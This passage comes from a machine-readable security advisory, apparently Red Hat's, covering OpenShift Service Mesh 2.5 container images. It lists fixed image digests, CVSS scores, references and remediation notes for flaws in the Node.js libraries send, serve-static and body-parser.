"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "send: Code Execution Vulnerability in Send Library"
},
{
"cve": "CVE-2024-43800",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-09-10T15:30:33.631718+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311154"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "serve-static: Improper Sanitization in serve-static",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43800"
},
{
"category": "external",
"summary": "RHBZ#2311154",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2311154"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43800",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43800"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43800"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b",
"url": "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa",
"url": "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa"
},
{
"category": "external",
"summary": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p",
"url": "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p"
}
],
"release_date": "2024-09-10T15:15:17.937000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-07T09:24:53+00:00",
"details": "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:7725"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 5.0,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "serve-static: Improper Sanitization in serve-static"
},
{
"cve": "CVE-2024-45590",
"cwe": {
"id": "CWE-405",
"name": "Asymmetric Resource Consumption (Amplification)"
},
"discovery_date": "2024-09-10T16:20:29.292154+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2311171"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in body-parser. This vulnerability causes denial of service via a specially crafted payload when the URL encoding is enabled.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "body-parser: Denial of Service Vulnerability in body-parser",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64",
"8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64",
"8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x",
